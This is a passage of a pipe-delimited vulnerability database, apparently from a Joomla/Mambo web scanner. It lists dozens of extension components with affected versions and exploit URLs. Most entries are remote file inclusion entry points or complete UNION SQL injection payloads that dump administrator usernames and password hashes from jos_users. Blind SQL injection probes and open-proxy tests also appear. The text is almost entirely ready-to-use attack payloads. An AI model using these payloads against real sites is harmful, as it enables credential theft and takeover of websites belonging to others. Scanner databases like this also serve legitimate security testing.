older|/administrator/components/com_mosmedia/|/administrator/components/com_mosmedia/media.tab.php?mosConfig_absolute_path= MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and older|/admin/components/com_mosmedia/|/admin/components/com_mosmedia/media.tab.php?mosConfig_absolute_path= WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtgallery/|/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_wmtgallery/|/admin/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= Webmaster Tips Portfolio File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Webmaster Tips Portfolio File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_wmtportfolio/|/admin/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Joomla Flash Uploader File Inclusion Vulnerability Versions effected: 2.5.2 and older|/admin/components/com_joomla_flash_uploader/|/admin/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= Color Lab File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site= Color Lab File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site= Carousel Flash Image Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= Carousel Flash Image Gallery File Inclusion 
Vulnerability Versions Affected: 1.0 and older|/admin/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
JUser File Inclusion Vulnerability Versions Affected: 1.0.14 and older|/administrator/components/com_juser/|/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
JUser File Inclusion Vulnerability Versions Affected: 1.0.14 and older|/admin/components/com_juser/|/admin/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
Joomla! 12Pictures File Inclusion Vulnerability Versions Affected: 1.0 and older|/administrator/components/com_joom12pic/|/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Joomla! 12Pictures File Inclusion Vulnerability Versions Affected: 1.0 and older|/admin/components/com_joom12pic/|/admin/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Flash Panoramic View File Inclusion Vulnerability Versions Affected: 1.0 and older|/administrator/components/com_panoramic/|/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Flash Panoramic View File Inclusion Vulnerability Versions Affected: 1.0 and older|/admin/components/com_panoramic/|/admin/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0 <=|/components/com_comprofiler/plugin.class.php|/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
com_admin File Inclusion Vulnerability Versions Affected: N/A|/admin/components/com_admin/admin.admin.html.php|/admin/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
com_admin File Inclusion Vulnerability Versions Affected: N/A|/components/com_admin/admin.admin.html.php|/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
com_flyspray File Inclusion Vulnerability Versions Affected: N/A|/components/com_flyspray/startdown.php|/components/com_flyspray/startdown.php?file=
com_admin File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_admin/admin.admin.html.php|/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
ExtCalendar File Inclusion Vulnerability Versions Affected: 0.9.1 and older|/components/com_extcalendar/extcalendar.php|/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
PC CookBook File Inclusion Vulnerability Versions Affected: 1.3 and older|/components/com_pccookbook/pccookbook.php|/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
com_smf File Inclusion Vulnerability Versions Affected: N/A|/components/com_smf/smf.php|/components/com_smf/smf.php?mosConfig_absolute_path=
mod_calendar File Inclusion Vulnerability Versions Affected: N/A|/modules/mod_calendar.php|/modules/mod_calendar.php?absolute_path=
com_loudmounth File Inclusion Vulnerability Versions Affected: N/A|/components/com_loudmounth/includes/abbc/abbc.class.php|/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
Multibanners File Inclusion Vulnerability Versions Affected: Any Version|/administrator/components/com_multibanners/extadminmenus.class.php|/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
Multibanners File Inclusion Vulnerability Versions Affected: Any Version|/admin/components/com_multibanners/extadminmenus.class.php|/admin/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
akocomments.php File Inclusion Vulnerability Versions Affected: N/A|/akocomments.php|/akocomments.php?mosConfig_absolute_path=
Crop Image File Inclusion Vulnerability Versions Affected: 1.0 and older|/administrator/components/com_cropimage/admin.cropcanvas.php|/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Crop Image File Inclusion Vulnerability Versions Affected: 1.0 and older|/admin/components/com_cropimage/admin.cropcanvas.php|/admin/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Serverstat File Inclusion Vulnerability Versions Affected: 0.4.4 and older|/administrator/components/com_serverstat/install.serverstat.php|/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Serverstat File Inclusion Vulnerability Versions Affected: 0.4.4 and older|/admin/components/com_serverstat/install.serverstat.php|/admin/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Remository File Inclusion Vulnerability Versions Affected: 3.25 and older|/administrator/components/com_remository/admin.remository.php|/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Remository File Inclusion Vulnerability Versions Affected: 3.25 and older|/admin/components/com_remository/admin.remository.php|/admin/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Lurm Constructor File Inclusion Vulnerability Versions Affected: 0.6b and older|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
Lurm Constructor File Inclusion Vulnerability Versions Affected: 0.6b and older|/admin/components/com_lurm_constructor/admin.lurm_constructor.php|/admin/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
Php Shop File Inclusion Vulnerability Versions Affected: 1.2 RC2b and older|/administrator/components/com_phpshop/toolbar.phpshop.html.php|/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Php Shop File Inclusion Vulnerability Versions Affected: 1.2 RC2b and older|/admin/components/com_phpshop/toolbar.phpshop.html.php|/admin/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Mambo eMail Publisher File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_mmp/help.mmp.php|/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
BSQ Site Stats File Inclusion Vulnerability Versions Affected: N/A|/components/com_bsq_sitestats/external/rssfeed.php|/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
CHRONOContact File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_chronocontact/excelwriter/PPS/File.php|/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
CHRONOContact File Inclusion Vulnerability Versions Affected: N/A|/admin/components/com_chronocontact/excelwriter/PPS/File.php|/admin/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
com_feederator File Inclusion Vulnerability Versions Affected: N/A|/components/com_feederator/includes/tmsp/add_tmsp.php|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
com_feederator File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
com_feederator File Inclusion Vulnerability Versions Affected: N/A|/admin/components/com_feederator/includes/tmsp/add_tmsp.php|/admin/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component GameQ Remote SQL Injection Versions Affected: 4.0 <=|/components/com_gameq/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
astatsPRO SQL Injection Vulnerability Versions Affected: 1.0.0 and older|/administrator/components/com_astatspro/refer.php|/administrator/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
astatsPRO SQL Injection Vulnerability Versions Affected: 1.0.0 and older|/admin/components/com_astatspro/refer.php|/admin/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
prayercenter Remote SQL Injection Versions Affected: N/A|/components/com_prayercenter|/index.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
pcchess SQL Injection Vulnerability Versions Affected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_garyscookbook SQL Injection Vulnerability Versions Affected: N/A|/components/com_garyscookbook/|/index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_hello_world SQL Injection Vulnerability Versions Affected: N/A|/components/com_hello_world/|/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_cms SQL Injection Vulnerability Versions Affected: N/A|/components/com_cms/|/index.php?option=com_cms&act=viewitems&cat_id=-9999999+UNION+SELECT+111,111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),222,222,333,333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_most SQL Injection Vulnerability Versions Affected: N/A|/components/com_most/|/index.php?option=com_most&mode=email&secid=-9999999+UNION+SELECT+0000,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,3333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_idvnews SQL Injection Vulnerability Versions Affected: N/A|/components/com_idvnews/|/index.php?option=com_idvnews&id=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_joomlavvz SQL Injection Vulnerability Versions Affected: N/A|/components/com_joomlavvz/|/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+UNION+SELECT+0x3a,0x3a,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_referenzen SQL Injection Vulnerability Versions Affected: N/A|/components/com_referenzen/|/index.php?option=com_referenzen&Itemid=7&detail=-9999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_genealogy SQL Injection Vulnerability Versions Affected: N/A|/components/com_genealogy/|/index.php?option=com_genealogy&task=profile&id=-9999999+UNION+SELECT+0,1,2,3,4,5,6,7,8,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_listoffreeads SQL Injection Vulnerability Versions Affected: N/A|/components/com_listoffreeads/|/index.php?option=com_listoffreeads&AdId=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_geoboerse SQL Injection Vulnerability Versions Affected: N/A|/components/com_geoboerse/|/index.php?option=com_geoboerse&page=view&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_ricette SQL Injection Vulnerability Versions Affected: N/A|/components/com_ricette/|/index.php?option=com_ricette&Itemid=1&func=detail&id=-9999999+UNION+SELECT+0,0,111,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_team SQL Injection Vulnerability Versions Affected: N/A|/components/com_team/|/index.php?option=com_team&gid=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,username,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_formtool SQL Injection Vulnerability Versions Affected: N/A|/components/com_formtool/|/index.php?option=com_formtool&task=view&formid=2&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_sg SQL Injection Vulnerability Versions Affected: N/A|/components/com_sg/|/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,10,11,0,0,14,15,16+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
faq SQL Injection Vulnerability Versions Affected: N/A|/components/com_faq|/index.php?option=faq&task=viewallfaq&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_omnirealestate SQL Injection Vulnerability Versions Affected: N/A|/components/com_omnirealestate/|/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&results=joomla
com_model SQL Injection Vulnerability Versions Affected: N/A|/components/com_model/|/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999+UNION+SELECT+username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_mezun SQL Injection Vulnerability Versions Affected: N/A|/components/com_mezun/|/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_ewriting SQL Injection Vulnerability Versions Affected: N/A|/components/com_ewriting/|/index.php?option=com_ewriting&Itemid=9999&func=SELECTcat&cat=-1+UNION+ALL+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_livechat SQL Injection Vulnerability Versions Affected: N/A|/components/com_livechat/getSavedChatRooms.php|/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_livechat SQL Injection Vulnerability Versions Affected: N/A|/administrator/components/com_livechat/getSavedChatRooms.php|/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_livechat SQL Injection Vulnerability Versions Affected: N/A|/admin/components/com_livechat/getSavedChatRooms.php|/admin/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_livechat Open Proxy Vulnerability Versions Affected: N/A|/components/com_livechat/xmlhttp.php|/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
com_livechat Open Proxy Vulnerability Versions Affected: N/A|/administrator/components/com_livechat/xmlhttp.php|/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
com_livechat Open Proxy Vulnerability Versions Affected: N/A|/admin/components/com_livechat/xmlhttp.php|/admin/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
com_mydyngallery SQL Injection Vulnerability Versions Affected: N/A|/components/com_mydyngallery/|/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_jmovies SQL Injection Vulnerability Versions Affected: N/A|/components/com_jmovies|/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+union+select+1,concat(0x215F,username,0x3a,password,0x215F)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_tech_article SQL Injection Vulnerability Versions Affected: N/A|/components/com_tech_article/|/index.php?option=com_tech_article&task=item&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_hbssearch Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_hbssearch/|/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+substring(@@version,1,1)=5::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+substring(@@version,1,1)=6
com_tophotelmodule Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_tophotelmodule/|/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5::/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=6
com_volunteer SQL Injection Vulnerability Versions Affected: N/A|/components/com_volunteer|/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&filter=&city_id=&function_id=&limit=5&pageno=1
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_lowcosthotels|/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=6
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_allhotels|/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=6
Joomla Component com_ice (catid) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_ice/|/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5::/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=6
Joomla Component com_liveticker (tid) Blind SQL Injection Vulnerability|/components/com_liveticker/|/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5::/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=6
Joomla Component com_mdigg (category) SQL Injection Vulnerability Versions Affected: N/A|/components/com_mdigg|/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
Joomla Module com_5starhotels (id) SQL Injection Vulnerability Versions Affected: N/A|/components/com_5starhotels|/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--